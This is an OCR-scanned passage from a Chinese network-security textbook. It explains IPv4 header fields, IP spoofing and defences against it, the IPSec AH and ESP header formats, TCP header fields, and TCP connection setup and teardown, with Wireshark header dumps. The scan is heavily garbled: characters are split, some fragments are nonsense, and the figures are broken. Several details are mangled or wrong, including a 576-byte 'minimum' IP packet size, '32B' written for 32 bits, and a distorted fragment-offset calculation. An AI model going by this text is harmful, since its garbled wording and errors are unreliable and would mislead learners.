IPv4 中 所 允许 的 IP 包 长 度 最 大 字 节 为 64KB, 最 小 为 576B。 

CO 标识 。16 位 ,用 于 IP 包 的 分 段 与 重组 。 不同 的 通信 和 链 路 所 能 允许 通过 的 最 大 数据 
包 不 尽 相 同 。 网 络 中 通信 和 链 路 所 允许 传输 的 最 大 传输 单位 称 为 最 大 传输 单元 (Maximum 
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Transfer Unit,MTU)。 当 IP 包 的 长 度 大 于 该 网 络 的 MTU 时 ,网 络 设备 (如 路 由 器 ) 会 将 该 
IP 包 分 割 为 多 个 较 小 的 他 包 ,以 便 在 该 网 络 中 传输 。 当 各 个 被 分 割 的 小 的 IP 包 最 终 到 达 
接收 方 的 出 口 ( 即 路 由 器 ) 时 ,必须 重组 还 原 为 最 初 的 IP 包 。 分 割 后 的 IP 包 用 源 IP 以 及 16 
位 标识 字段 来 共同 标识 其 是 否 属于 同一 个 原 IP 包 。 

(6) 标志 。3 位 ,该 字段 用 来 标识 IP 包 被 分 割 的 情况 。 其 3 位 的 含义 分 别 为 不 允许 IP 
包 分 割 (Do not Fragment) ,IP 包 已 被 分 割 和 其 后 尚 有 被 分 割 的 IP 包 (More Fragments), 

(7) 分 段 移 位 标志 。13 位 ,用 来 标识 被 分 割 的 小 数据 包 在 原 IP. 包 中 的 位 置 ,从 而 实现 
重组 。 由 于 基本 分 段 单 位 为 8B, 每 个 数据 报 最 长 为 分 段 偏 移 值 乘 8, 即 2”X8=8192X 8— 
65 536B, 比 “总 长 度 "字段 提供 的 最 大 值 还 长 。 

(8) 生存 期 (Time to Live, TTL). 8 位 ,该 字段 用 来 指定 一 个 IP 包 可 以 在 网 络 中 经 过 
的 路 由 器 的 最 大 数目 。 每 经 过 一 个 路 由 器 ,TTL 字段 的 值 就 被 减 1, 当 其 值 变 成 0 的 时 候 ， 
路 由 器 便 会 将 此 IP 包 丢 弃 , 并 向 源 发 送 ICMP 出 错 报 文 。TTL 字段 的 主要 作用 在 于 控制 
IP 包 的 生命 周期 ,避免 网 络 中 存在 大 量 “ 游 荡 ” 的 数据 包 。 

(9) 协议 标识 。8 位 ,用 来 标识 所 传递 的 数据 是 上 层 的 何 种 协议 。 例 如 ,0x06 表示 
TCP.0xll 表示 UDP,0x01 表示 ICMP 等 。 目 的 主机 上 的 IP 协议 处 理 进程 据 此 将 数据 包 
传送 给 上 层 对 应 的 通信 协议 进行 处 理 。 

(10) 报头 校 验 和 。16 位 ,IP 协议 处 理 进程 利用 校 验 和 算法 ,对 IP 包头 数据 进行 计算 
而 得 到 16 位 的 数值 ,用 以 验证 确认 IP 头 的 完整 性 。 当 校 验 值 为 0 时 ,表明 数据 在 传输 过 程 
中 没有 发 生 任何 差错 ; 否则 ,说 明 出 错 ,该 IP 包 将 被 丢弃 。 

QD W IP 地 址 。32 位 ,包含 发 送 方 的 IP 地址。 

(12) 目的 JP 地 址 。32 位 ,包含 接收 方 的 IP 地 址 。 

(13) 选项 。 传 送 方 可 以 根据 需求 在 IP 包 中 额外 加 入 一 些 字段 ,如 记录 路 由 (Record 
Route) , ili fft H (Source Route) AFE ER Time Stamp) 等 。 选 项 字段 长 度 不 固定 ,但 如 果 长 
度 字段 不 满 32 位 的 整数 倍 , 必 须 在 最 后 补 满 32 位 的 整数 倍 。 

(14) 填充 位 。 如 果 有 选项 ,而 选项 的 长 度 不 是 32 位 的 整数 倍 , 则 通过 该 填充 位 来 补 齐 
数据 。 

图 2-11 显示 采集 的 IP 数据 包头 部 的 每 一 个 字段 的 值 。 

2. IP 协议 面临 的 安全 威胁 

根据 IP 协议 ,路 由 器 只 是 根据 IP 分 组 的 目的 IP 地 址 来 确定 该 IP 分 组 从 哪 一 个 端口 
发 送 的 ,而 不 关心 该 IP 分 组 的 源 IP 地 址 。 基 于 该 原理 ,任意 节点 均 可 以 构造 IP 分 组 ,其 源 
IP 地 址 并 非 当 前 节点 的 IP 地 址 ,该 IP 分 组 能 够 顺利 到 达 目 的 节点 , 即 IP 欺骗 攻击 (IP 
Spoofing) 。IP 欺骗 攻击 能 够 轻易 通过 libpcap/winpcap 库 或 者 raw socket 编程 实现 。 

IP 欺骗 攻击 主要 用 于 两 类 网 络 攻 击 , 即 拒绝 服务 攻击 和 基于 IP 地 址 认证 的 网 络 服务 
中 。 拒 绝 服务 攻击 通常 采用 假冒 IP 地 址 ,以 避免 被 追踪 而 受到 惩罚 ,攻击 者 构造 针对 同一 
HÁJ IP 地址 的 全 分 组 ,而 这 些 分 组 的 源 IP 地 址 为 随机 的 IP 地 址 。 通 常 接收 方 会 把 这 类 
包 作 为 合法 的 协议 包 进 行 处 理 , 从 而 占用 接收 方 的 大 量 资源 ,直至 无 法 接收 新 的 请 求 , 导 致 
拒绝 服务 攻击 。 当 前 ,由 于 服务 器 的 性 能 通常 比较 强大 ,直接 通过 单个 主机 构造 拒绝 服务 攻 
击 的 可 能 性 已 经 很 小 ,更 常见 的 方式 是 通过 僵尸 网 络 (Botnet) 构 造 大 规模 分 布 式 拒绝 服务 
攻击 ,在 这 种 情况 下 是 否 采 用 假冒 IP 的 方式 已 经 无 关 紧 要 了 。 某 些 类 型 的 网 络 服务 通过 源 
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Ej Internet Protocol, Src: 220.181.111.120 (220.181.111.120), Dst: 192.168.1.100 (192.168.1.100) 
Version: 4 
Header length: 20 bytes 
Ej Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport)) 
0000 00.. = Differentiated Services Codepoint: Default (0x00) 
00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00) 
Total Length: 567 
Identification: 0x3c72 (15474) 
& Flags: 0x02 (Don't Fragment) 
i = Reserved bit: Not set 
= Don't fragment: set 
= More fragments: Not set 
Fragment offset: 0 
Time to live: 52 
Protocol: TCP (6) 
S Header checksum: Oxfai4 [correct] 
[Good: True] 
[Bad: False] 
Source: 220.181.111.120 (220.181.111.120) 
Destination: 192.168.1.100 (192.168.1.100) 
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Frame (581 bytes) Reassembled TCP (10607 bytes) | 
; "C MDocuments and Settings Admin" | Packets: 308 Displayed: 308 Marked: 0 Load time: 0:0… [T ofile: Default 


2-11 IP 数据 包头 部 字段 


























IP 地 址 来 认证 请 求 的 合法 性 ,如 X-window rlogin, rsh 等 ,攻击 者 可 以 假冒 可 信 的 IP 地 址 
而 非法 访问 计算 机 资源 。 

由 于 IP 协议 本 身 没 有 验证 源 IP 地 址 真实 性 的 机 制 , 因 此 防范 IP 欺骗 攻击 比较 困难 。 
目前 ,可 以 通过 入 口 / 出 口 过 滤 和 IP 回溯 技术 来 防范 IP 欺骗 攻击 。 通 过 设置 一 个 网 络 的 网 
关 、 配 置 网 关 过 滤 源 IP 地 址 非法 的 IP 分 组 可 以 在 一 定 程 度 上 防范 IP 欺骗 攻击 。 对 于 进入 
网 络 的 IP 分 组 ,如 果 其 源 IP 属于 该 网 络 , 则 认为 是 非法 的 IP 分 组 , 即 入 口 过 滤 (Ingress 
Filtering); 反之 ,对 于 传 出 的 网 络 IP 分 组 ,如 果 其 源 IP 不 属于 当前 网 络 , 则 认为 是 非法 的 
IP 分 组 , 即 出 口 过 滤 (Egress Filtering)。 然 而 ,由 于 并 非 所 有 的 网 络 设备 都 支持 入 口 /出 口 
过 滤 功 能 ,而 且 开 启 入 口 /出 口 过 滤 功 能 会 影响 网 络 的 性 能 ,因此 在 实际 的 网 络 环境 中 很 少 
应 用 入 口 /出 口 过 滤 。 针 对 这 种 现象 ,IP 回溯 技术 成 为 一 个 新 的 选择 ,该 技术 能 够 回溯 一 
IP 分 组 到 其 所 在 的 网 络 ,从 而 能 够 追踪 攻击 者 到 其 所 在 的 网 络 , 给 攻击 者 造成 一 定 的 威慑 。 
在 IP 回溯 技术 中 ,比较 有 效 的 是 随机 包 标 记 技术 , 即 网 络 节 点 对 通过 的 IP 分 组 的 保留 字段 
随机 添加 标记 ,进而 对 这 些 标记 进行 分 析 ,得 出 该 分 组 所 经 过 的 网 络 节点 ,从 而 构造 出 该 分 
组 所 经 过 的 路 径 , 该 技术 已 经 得 到 广泛 研究 。 虽然 IP 回溯 技术 是 一 种 比较 有 效 地 防范 IP 
欺骗 攻击 的 技术 ,但 是 就 目前 而 言 ,IP 回溯 技术 还 未 得 到 广泛 应 用 ,因此 其 威慑 力也 是 有 
限 的 。 

3. IP 协议 的 安全 机 制 

针对 IP 协议 的 安全 缺陷 ,IETF( 国 际 互 联网 工程 任务 组 ) 设 计 了 IP 安全 协议 (IPSec) 
和 因特网 密 钥 管理 协议 (Internet Key Management Protocol,IKMP) 。IPSec 的 主要 目的 是 
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使 需要 安全 措施 的 用 户 能 够 使 用 相应 的 加 密 安全 体制 ,该 体制 不 仅 能 够 在 IPv4 下 工作 ,还 
可 以 在 IPv6 下 工作 ; 这 个 安全 体制 的 主要 内 容 是 在 IP 数据 包 的 头 部 增设 身份 验证 头 部 协 
议 (Authentication Header,AH) 和 封装 安全 载荷 协议 (Encapsulating Security Payload, 
ESP), AH 提供 无 连接 的 数据 完整 性 ,数据 来 源 验证 和 抗 重 放 攻击 服务 ,ESP 除了 提供 上 
述 功能 外 ,还 提供 数据 包 加 密 和 数据 流 加 密 服 务 。 

1) 身份 验证 头 部 协议 

AH 头 信息 紧 跟 在 “IPv4 头 部 ”之 后 ,如 图 2-12 所 示 。AH 包含 下 一 个 头 部 .有 效 载 荷 
长 度 .保留 .安全 参数 指针 (Security Pramater Index. SPD 序列 号 字段 以 及 验证 数据 等 信息 。 


IPv4 首 部 | AH 上 层 协议 (TCP | 





或 UDP) 











Es 
E 


| 下 一 个 首部 | 有 效 载荷 长 度 
| 安全 参数 指针 (SPD 

| 序列 号 字段 | 
| 验证 数据 G32 位 的 整数 倍 ) — | 




















2-12. 使 用 认证 头 AH 的 IP 数据 包 


在 图 2-12 中 ,所 有 字段 都 是 必需 的 。 

(1) 下 一 个 头 部 ,8 位 ,表示 紧 跟 在 AH 头 部 的 下 一 个 有 效 载荷 的 类 型 ,也 就 是 紧 跟 在 
AH 头 部 后 面 数据 的 协议 。 在 传输 模式 下 ,该 字段 是 处 于 保护 中 的 传输 层 协议 的 值 ,如 
6(TCP)、17(UDP) 或 50(ESP)。 在 隧道 模式 下 ,AH 所 保护 的 是 整个 IP 包 , 该 值 是 4, 表示 
IP-in-IP 协议 。 

(2) 有 效 载 荷 长 度 ,8 位 ,其 值 是 以 32 位 (4B) 为 单位 的 整个 AH 数据 (包括 头 部 和 变 长 
的 认证 数据 ) 的 长 度 再 减 2 。 

(3) 保留 ,16 位 ,作为 保留 用 ,实现 中 应 全 部 设置 为 0。 

(4) 安全 参数 指针 ,32 位 ,与 源 /目的 IP 地 址 .IPSec 协议 一 起 组 成 的 三 元 组 可 以 为 该 
IP 包 唯一 地 确定 一 个 SA。[L1,255] 保 留 为 将 来 使 用 ,0 保留 本 地 的 特定 实现 使 用 。 因 此 ,可 
用 的 SPI 值 为 L256,2” 一 1]。 在 双向 连接 中 ,每 个 方向 都 要 建立 一 个 单独 的 SA, 它 为 不 同 
方向 上 的 各 种 服务 选择 安全 的 口令 算法 及 密 钥 提供 灵活 性 。SA 有 两 种 模式 , 即 传输 模式 
和 隧道 模式 ,传输 模式 是 两 个 主机 之 间 的 安全 关联 ,隧道 模式 是 安全 网 关 与 安全 网 关 之 间 的 
安全 关联 。 

O 序列 号 字段 ,32 位 ,作为 一 个 单调 递增 的 计数 器 ,为 每 一 个 AH 包 赋 予 一 
当 通 信和 双方 建立 SA 时 ,计数 器 初始 化 为 0。SA 是 单 向 的 ,每 发 送 一 个 包 , 外 出 SA 的 计数 
器 增 1; 每 接收 一 个 包 , 进 入 SA 的 计数 器 增 1。 该 字段 可 以 用 于 抵抗 重 放 攻击 。 

(6) 验证 数据 ,可 变 长 部 分 ,包含 了 验证 数据 ,也 就 是 HMAC 算法 的 结果 , 称 为 ICV 
(Integrity Check Value, 完 整 性 校 验 值 ) 。 该 字段 是 32 位 的 整数 倍 , 如 果 ICV 不 是 32 位 的 
整数 倍 , 则 用 于 生成 ICYV 的 算法 由 SA 指定 。 

2) 封装 安全 载荷 协议 

ESP 协议 和 TCP、UDP、AH 协议 一 样 ,是 被 IP 协议 封装 的 协议 之 一 。 一 个 IP 包 的 载 
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荷 是 否 是 ESP 协议 ,由 IP 协议 头 部 中 的 协议 字段 判断 ,ESP 协议 字段 是 50。 如 果 一 个 IP 
包 封 装 的 是 ESP 协议 ,在 全 包头 (包括 选项 字段 ) 后 面 紧 跟 的 就 是 ESP 协议 头 部 ,其 格式 如 
图 2-13 所 示 。 





























0 7 15 31 
SPI 
序列 号 
于 载荷 数据 ( 变 长 ) Y 
填充 (0 一 255B) 
填充 长 度 下 一 个 头 
T 验证 数据 ( 变 长) Y 











2-13 ESP 头 部 格式 


ESP 头 部 格式 包括 以 下 内 容 。 

(1) SPI,32 位 整数 ,与 源 / 目 的 IP 地 址 .IPSec 协议 一 起 组 成 的 三 元 组 可 以 为 该 IP 包 
唯一 地 确定 一 个 SA. 

(2) 序列 号 ,32 位 整数 ,作为 一 个 单调 递增 的 计数 器 ,为 每 一 个 ESP 包 赋 予 一 个 序号 。 
当 通 信 双 方 建立 SA 时 ,计数 器 初始 化 为 0。SA 是 单 向 的 ,每 发 送 一 个 包 , 外 出 SA 的 计数 
器 增 1; 每 接收 一 个 包 , 进 入 SA 的 计数 器 增 1。 该 字段 可 以 用 于 抵抗 重 放 攻击 。 

(3) 载荷 数据 ,这 是 变 长 字段 ,包含 了 实际 的 载荷 数据 。 不 管 SA 是 否 需要 加 密 ,该 字 
段 总 是 必需 的 。 如 果 采 用 了 加 密 , 该 部 分 就 是 加 密 的 密 文 ; 如 果 没 有 加 密 , 该 部 分 就 是 明 
文 。 如 果 采 用 的 加 密 算法 需要 一 个 IV CInitial Vector, 初 始 向 量 ),IV 也 是 在 本 字段 中 传输 
的 。 该 加 密 算法 的 规范 必须 能 够 指明 IV 的 长 度 以 及 在 本 字段 中 的 位 置 。 本 字段 的 长 度 必 
须 是 8bit 的 整数 倍 。 

(4) 填充 ,该 字段 包含 了 填充 位 。 

O 填充 长 度 ,该 字段 是 一 个 8 位 字段 ,以 B 为 单位 ,指示 了 填充 字段 的 长 度 ,其 范围 为 
[0.255]. 

(6) 下 一 个 头 ,8 位 字段 ,指明 了 封装 在 载荷 中 的 数据 类 型 ,如 6 表示 TCP 数据 。 

(7) 验证 数据 , 变 长 字段 ,只 有 选择 了 验证 服务 时 才 会 有 该 字段 ,包含 了 验证 的 结果 。 


2.4 传输 层面 临 的 安全 威胁 
2.4.1 TCP 协议 的 安全 威胁 与 安全 机 制 


1. TCP 协议 

TCP 协议 是 面向 连接 的 、 可 靠 的 数据 传输 协议 ,被 广泛 应 用 于 传输 大 量 数据 的 场合 。 
大 量 的 应 用 层 协议 都 是 基于 TCP 构建 的 , 如 文件 传输 协议 (FTP)、 超 文本 传输 协议 
《HTTP) 等 。 
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TCP 是 一 种 端 到 端 协议 ,这 是 因为 它 对 两 台 计算 机 之 间 的 连接 起 了 重要 作用 : 当 一 台 
计算 机 需要 与 男 一 台 计算 机 连接 时 ,TCP 协议 会 为 它们 建立 连接 、 发 送 数据 和 接收 数据 以 
及 终止 连接 。TCP 协议 利用 确认 - 重 传 技 术 和 拥塞 控制 机 制 , 向 应 用 程序 提供 可 靠 的 通信 
连接 ,从 而 使 其 能 够 自动 适应 网 上 的 各 种 变化 。 一 般 而 言 ,即使 在 Internet 暂时 出 现 拥塞 的 
情况 下 ,TCP 也 能 够 通过 其 提供 的 流量 控制 机 制 保证 通信 可 靠 和 畅通 传输 。 此 外 ,TCP 协 
议 也 提供 数据 包 的 保 序 服务 ,每 个 数据 包 有 一 个 唯一 序列 号 ,用 以 标识 其 唯一 性 。TCP 数 
据 包头 部 格式 如 图 2-14 所 示 。 
























































TCP 源 端口 (16) TCP 目的 端口 (16) 
序列 号 (32) 
确认 号 (32) 
包头 长 度 | 保留 (6) |URG|ACK|PSH |RST|SYN| FIN 窗口 (16) 
校 验 和 (16) 紧急 指针 (16) 
选项 (如 果 有 ) 填充 位 
数据 











2-14. TCP 数据 包头 部 格式 


TCP 数据 段 以 固定 格式 的 20B 头 部 开始 ,在 首部 后 面 是 一 些 选 项 及 其 填充 字 节 (以 满足 
32B 要 求 )。 在 可 选项 后 面 才 是 数据 ,如 果 有 , 则 最 长 为 65 535 一 20(IP 头 ) 一 20(TCP 头 ) 一 
65 495B。 不 带 数 据 的 头 部 常用 作 确 认 报 文 和 控制 报 文 。 

(1) TCP 源 端口 (Source Port Number) 和 TCP 目的 端口 (Destination Port Number), 
源 端口 和 目的 端口 用 来 标识 发 送 方 和 接收 方 的 应 用 程序 ( 即 进程 )。TCP 协议 使 用 “端口 
号 ?来 标识 源 端 和 目的 端 处 理 该 数据 包 的 应 用 进程 。 端 口号 可 以 使 用 0 一 65 535 之 间 的 任 
何 数字 。 当 收 到 一 个 服务 请 求 时 ,操作 系统 内 核 会 动态 地 为 对 方 的 应 用 程序 分 配 端口 号 。 
而 在 服务 器 端 ,每 种 服务 在 “众所周知 的 端口 "(Well Known Port) 为 客户 提供 各 种 服务 。 
例如 ,HTTP 服务 端口 号 为 80,SMTP 端口 号 为 25 等 。 一 般 而 言 ,1024 以 下 的 端口 号 被 保 
留用 来 提供 一 些 公开 服务 。 

(2) 序列 号 (Sequence Number. SN) .32 位 ,用 来 识别 TCP 分 片 在 整个 数据 流 中 所 在 的 
位 置 。 当 通信 双方 建立 连接 之 后 ,会 协商 一 个 初始 序列 号 (Initial Serial Number,ISN)。 当 
发 送 方 发 送 第 一 个 分 片 时 ,其 序列 号 为 ISN 十 1。 之 后 每 个 TCP 分 片 的 序列 号 必须 按照 接 
收 方 所 响应 的 确认 序列 号 来 增加 。 

(3) 确认 号 (ACKnowledgement Number. ACK).32 位 ,是 接收 方 期 待 的 、 发 送 方 下 次 
应 该 传输 的 TCP 分 片 的 序列 号 。 接 收 方 据 此 来 确定 下 一 个 将 被 发 送 的 分 片 ,进而 分 配对 应 
的 序列 号 。 需 要 注意 的 是 ,确认 序列 号 的 更 改 不 是 简单 的 顺序 加 1 方式 ,而 是 以 接收 到 的 序 
列 号 和 收 到 分 片 的 大 小 来 确定 。 例 如 ,假设 发 送 方 传送 了 一 个 SN —1000,1& EE Jy 100 的 分 
片 , 接 收 方 收 到 后 ,应 该 会 给 一 个 ACK 二 1101(1000 十 100 十 1) 的 消息 。 

(4) 包头 长 度 (Header Length) ,是 指 以 32 位 为 单位 的 TCP 头 (包括 选项 option 部 分 ) 
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的 总 长 度 。 如 果 没 有 任何 选项 ,TCP 头 部 长 度 为 20B。 最 多 可 以 有 60B 的 TCP 头 部 长 度 。 

(5) 控制 位 ,6 位 ,第 1 个 标志 URG ,表示 TCP 头 中 的 紧急 指针 (Urgent Pointer) 是 否 
有 效 ; 第 2 个 标志 ACK ,确认 序列 号 有 效 , 表 示 TCP 头 中 的 确认 序列 号 是 否 有 效 ; 第 3 个 
标志 PSH, 泛 洪 式 发 送 有 效 ,表示 该 消息 必须 尽快 发 送出 去 ,而 不 需要 进入 缓冲 区 ; 第 4 个 
标志 RST, 重 置 有 效 ,表示 重新 建立 连接 ; 第 5 个 标志 SYN, 同 步 有 效 , 表 示 发 送 方 要 建立 
连接 ,并 发 送 初 始 序 列 号 ISN; 第 6 个 标志 FIN ,释放 连接 有 效 ,表示 数据 已 经 发 送 完毕 , 希 
望 关 闭 连接 。 

(6) 窗口 大 小 (Windows Size) ,16 位 ,该 字段 是 TCP 的 滑动 窗口 机 制 的 依据 ,其 值 用 来 
告知 对 方 自己 所 期 待 的 窗口 的 大 小 ,从 而 实现 流量 控制 ,单位 为 字 节 数 ,这 个 值 是 本 机 期 望 
一 次 接收 的 字 节 数 。 

(7) 校 验 和 ,16 位 ,利用 校 验 和 算法 生成 的 TCP 包 的 完整 性 校 验 和 ,并 由 目的 端 进行 验 
证 。TCP 校 验 和 算法 与 IP 校 验 和 算法 相同 ,但 是 其 计算 范围 包括 TCP 头 、TCP 数据 以 及 
一 个 12B 的 TCP 伪 头 部 (Pseudo Header), 

(8) 紧急 指针 ,16 位 ,用 于 表示 所 发 送 的 数据 为 紧急 数据 ,该 字段 的 值 为 紧急 数据 最 后 
一 个 分 片 的 序列 号 。 

(9) 选项 ,该 字段 用 来 传输 额外 的 信息 。 例 如 ,建立 连接 时 ,可 以 传送 的 最 大 分 片 长 度 
(Maxmum Segment Size. MSS), 

图 2-15 显示 采集 的 TCP 数据 包头 部 每 一 个 字段 的 值 。 
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E] 
Source port: 4420 (4420) 
Destination port: http (80) 
[Stream index: 0] 
Sequence number: 1 (relative sequence number) 
Acknowledgement number: 1 (relative ack number) 
Header length: 20 bytes 












= Reserved: Not set 
= Nonce: Not set 
= Congestion window Reduced (CWR): Not set 
= ECN-ECho: Not set 
= Urgent: Not set 
= Acknowledgement: Set 4 
= Push: Not set 
= Reset: Not set 
m = Syn: Not set 
a 
& [Expert Info (chat/sequence): connection finish (FIN)] 
window size value: 63825 
[calculated window size: 63825] 
[window size scaling factor: -1 (unknown)] 
Ej Checksum: ox45c3 [validation disabled] 
[Good Checksum: False] 
[Bad checksum: False] 














[Ffackets: 308 Displayed. 308 Marked. O Load time 0 0 | Profile: Default 





O Frame (frane), 54 bytes 
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2. TCP 协议 的 特点 

1) 全 双 工 连接 

全 双 工 (Full Duplex) ,通信 允许 数据 在 两 个 方向 上 同时 传输 , 它 在 能 力 上 相当 于 两 个 
单 工 通 信 方 式 的 结合 ; 全 双 工 ,可 以 同时 (瞬时 ) 进 行 信号 的 双向 传输 (A-~~B H B>A), A>B 
的 同时 B-~>~A, 是 瞬时 同步 的 。 半 双 工 ,可 以 分 时 进行 信号 的 双向 传输 (A 一 B sk B>A); 
A=B h}, RÍE B>A; BA 时 ,不 能 A-~~B; 即 数据 发 送 和 数据 接收 是 分 时 进行 的 。 单 工 ， 
只 允许 AB 传送 数据 ,而 不 能 Bo A 传送 数据 。 

TCP 所 提供 的 全 双 工 连接 (Full-Duplex Connection) 服务 ,其 连接 的 两 端 有 两 条 彼此 独 
立 \ 方 向 相反 的 传输 通道 。TCP 也 允许 只 关闭 连接 某 一 方向 的 传输 , 称 为 半 双 工 连接 
(Half-duplex connection) 。 这 种 方式 所 带 来 的 益处 是 可 以 将 控制 信息 (如 应 答 ACK) 和 数 
据 一 起 传送 出 去 ,从 而 减少 网 络 流量 。 

2) 面向 连接 

面向 连接 (Connection-oriented) 是 指 通 信 双 方 在 开始 传输 数据 前 ,必须 通过 “三 次 握 
手 ? 的 方式 在 两 者 之 间 建 立 一 条 逻辑 上 的 链 路 ( 虚 电 路 ), 用 于 传输 数据 。TCP 连接 建立 包 
含 3 个 数据 包 的 发 送 , 因 此 称 为 三 次 握手 机 制 (Three-way Handshake)。 图 2-16 所 示 为 
TCP 三 次 握手 过 程 示意 图 ,其 中 的 ACK 有 两 个 含义 , 即 ACK 序列 号 .ACK 标志 位 ,读者 可 
以 通过 上 下 文 来 理解 其 含义 。 


SEQ-ISN4-1000(SYN-1) 





SEQ-ISN&4-2000 ACK4-1001I(SYN-1, ACK-1) 





ca - == Ni 
"NIE SEQ-1000 ACK-200l(ACK-1) ; v 
eO vl < 
EA | 0 0 0 0 0 0000 TTS 主机 B 


已 经 建立 的 TCP 连 接 





A 2-16 TCP 三 次 握手 过 程 


(1) 建立 连接 

(D 要 求 建立 连接 的 主机 A 产生 一 个 初始 序列 号 ISNA 的 同步 标志 数据 包 ( 简 称 SYN 
f) ,并 将 其 发 送 给 B。 其 中 ,该 包 中 TCP 头 部 的 序列 号 字段 (SEQ) 值 为 ISNA ,同步 标志 位 
SYN 字段 设 为 1( 在 图 2-16 中 表示 为 SEQ=ISN,=1000,SYN=1), 

@ 接收 方 主机 B 收 到 该 包 之 后 ,也 生成 一 个 自己 的 初始 序列 号 ISNs 的 同步 应 答 与 请 
求 包 (简称 ACK-SYN £D ,并 将 其 返回 给 A。 该 ACK-SYN 包 的 作用 有 两 个 ,一 是 表示 同 
意 对 方 的 初始 序列 号 请 求 , 二 是 向 对 方 表明 自己 的 初始 序列 号 。 因 此 ,该 ACK-SYN 包 的 
TCP 头 除 了 序列 号 字段 (SEQ) 的 值 为 ISNs、 同 步 标 志 位 (SYN) 和 应 签 标 志 位 (ACK) 均 设 
置 为 1 外 ,应 答 序 列 号 字段 (ACK) 的 值 为 A 所 请 求 的 初始 序列 号 加 1( 即 应 答 序 列 号 的 值 
为 ISNA 二 1)( 在 图 2-16 中 表示 为 SEQ—ISNs —2000. ACK4—1001, SYN—1. ACK— D, 

© 发 送 方 A 收 到 B 的 同步 应 答 与 请 求 数 据 包 后 , 回 送 一 个 序列 号 值 为 ISNs 十 1( 即 图 
中 的 2001) 的 应 答 数据 包 ( 简 称 ACK 包 ) ,表示 同意 B 的 初始 序列 号 请 求 。 其 中 ,该 ACK 包 
中 的 序列 号 字段 (SEQ) 值 为 ISNA 十 1( 即 ACK-SYN 包 中 应 答 序列 号 字段 中 的 值 ) ,应 答 序 
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列 号 字段 (ACK) 值 为 ISNe 十 1.ACK 标志 位 设置 为 1( 图 2-16 中 , SEQ = 1000, ACK = 
2001,ACK 标志 位 为 1)。 

至 此 ,三 次 握手 完成 ,双方 的 初始 序列 号 协商 完毕 。 需 要 注意 的 是 ,每 个 连接 需要 选择 
不 同 的 初始 序列 号 。 如 果 在 上 述 协 商 过 程 中 出 现 了 序列 号 冲突 的 情况 , 则 该 过 程 会 重复 进 
行 ,直到 协商 完成 。 

(2) 关闭 连接 

当 数 据 传输 完成 之 后 ,通信 双方 均 可 要 求 中 止 连接 。 由 于 TCP 连接 是 全 双 工 模式 , 因 
此 可 以 只 关闭 某 一 个 方向 的 连接 ,而 另 一 个 方向 的 连接 依然 保持 数据 传输 状态 。 如 果 要 完 
全 关闭 连接 , 则 必须 关闭 双向 连接 。 当 一 方 的 应 用 程序 通知 TCP 已 无 数据 需要 发 送 时 ， 
TCP 关闭 该 方向 的 连接 。 一 旦 某 个 方向 上 的 连接 被 关闭 之 后 ,就 只 能 接收 对 方 的 数据 ,而 
不 能 发 送 其 他 数据 (除了 释放 连接 的 消息 外 )。 图 2-17 是 关闭 双向 连接 的 过 程 示 意图 。 


已 经 建立 的 TCP 连 接 





SEQ=6000(FIN=1) 


es 
SEQ=8000 ACK-6001(ACK-1) 












SEQ=6001 ACK=8001(ACK=1) 





连接 被 释放 





图 2-17 TCP 关闭 双向 连接 过 程 示 意图 


CD 当 应 用 程序 请 求 释 放 连 接 时 ,向 TCP 发 送 关 闭 连 接 请 求 。 之 后 ,应 用 层 数 据 将 不 会 
传递 到 传输 层 。 收 到 应 用 程序 的 关闭 连接 请 求 之 后 ,请 求 关闭 连接 的 通信 方 A 的 TCP ^E 
成 一 个 带 序列 号 的 关闭 连接 请 求 包 ( 简 称 FIN 包 )( 图 2-17 中 该 序列 号 为 6000) ,并 将 其 发 
送 给 对 方 (B) ,已 请 求 关闭 连接 。 其 中 ,该 包 中 的 TCP 头 部 的 FIN 字段 必须 设 为 1, 而 其 序 
列 号 为 前 一 个 数据 包 的 序列 号 加 1。 发送 完毕 之 后 ,关闭 A M B Ay TCP 连接 。 虽然 A 到 B 
方向 的 连接 关闭 ,但 是 仍然 可 以 接收 数据 ,但 不 将 数据 发 送 到 应 用 层 。 

© 连接 的 另外 一 端 B 在 收 到 对 方 发送 的 FIN 包 后 , 回 送 一 个 关闭 连接 应 答 包 (简称 
FIN-ACK 包 )。 其 中 ,FIN-ACK 包 TCP 中 的 应 答 序列 号 字段 为 上 一 个 FIN 包 的 序列 号 加 
1。 同 时 ,告诉 相应 的 应 用 层 ,A 要 求 关闭 连接 且 A 到 B 的 连接 已 经 关闭 。 这 样 ,从 A 到 B 
的 连接 就 释放 了 ,整个 连接 处 于 半 关 闭 状态 (Half-close)。 此 后 ,B 将 不 再 接收 来 自 A 的 数 
据 ,但 是 如 果 BB 还 有 数据 需要 发 送 到 A, 也 可 以 继续 发 送 。 

© 当 B 需 要 结束 向 A 发 送 数据 时 ,其 应 用 程序 通知 TCP 释放 连接 。 此 时 也 生成 一 个 
FIN 包 , 并 将 其 发 送 给 A。 该 FIN 包 的 序列 号 字段 值 为 上 一 个 FIN-ACK 包 的 应 答 序 列 号 ， 
应 答 序列 号 字段 值 为 上 一 个 FIN-ACK 包 的 应 答 序列 号 加 1, 其 ACK 标志 位 必须 设 为 1。 

© A 收 到 B 发送 的 FIN 包 后 回 送 FIN-ACK 包 , 关 闭 并 释放 连接 。 其 中 ,该 FIN-ACK 
包 的 序列 号 字段 值 为 上 一 个 FIN 包 的 应 答 序 列 号 加 1, 而 应 答 序 列 号 字段 值 为 上 一 个 FIN 
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包 的 应 答 序 列 号 加 1 。 

至 此 ,双向 连接 关闭 ,连接 所 占用 的 资源 也 被 完全 释放 。 

3) 可 靠 性 

TCP 协议 的 可 靠 性 (Reliable) 体 现在 以 下 几 个 方面 。 

(1) 自动 分 片 (Segment)。 

(2) 保证 传送 给 应 用 层 的 数据 顺序 是 正确 的 。 

(3) 自动 过 滤 重 复 的 封包 。 

(4) 确认 - 重 传 机 制 确保 数据 包 可 靠 到 达 。 

4) 面向 字 节 流 

TCP 所 传输 的 数据 包 是 面向 字 节 流 (Byte-stream-oriented) 的 ,即将 多 个 消息 连 成 一 个 
字符 串 ,再 依照 TCP 所 认定 的 分 片 (Segment) 大 小 来 分 割 传送 ; 当 收 到 分 片 后 ,不 对 这 些 分 
片 进行 解析 ,而 是 直接 交 给 应 用 程序 去 处 理 。 因 此 ,应 用 程序 必须 自己 判断 是 否 收 到 了 所 有 
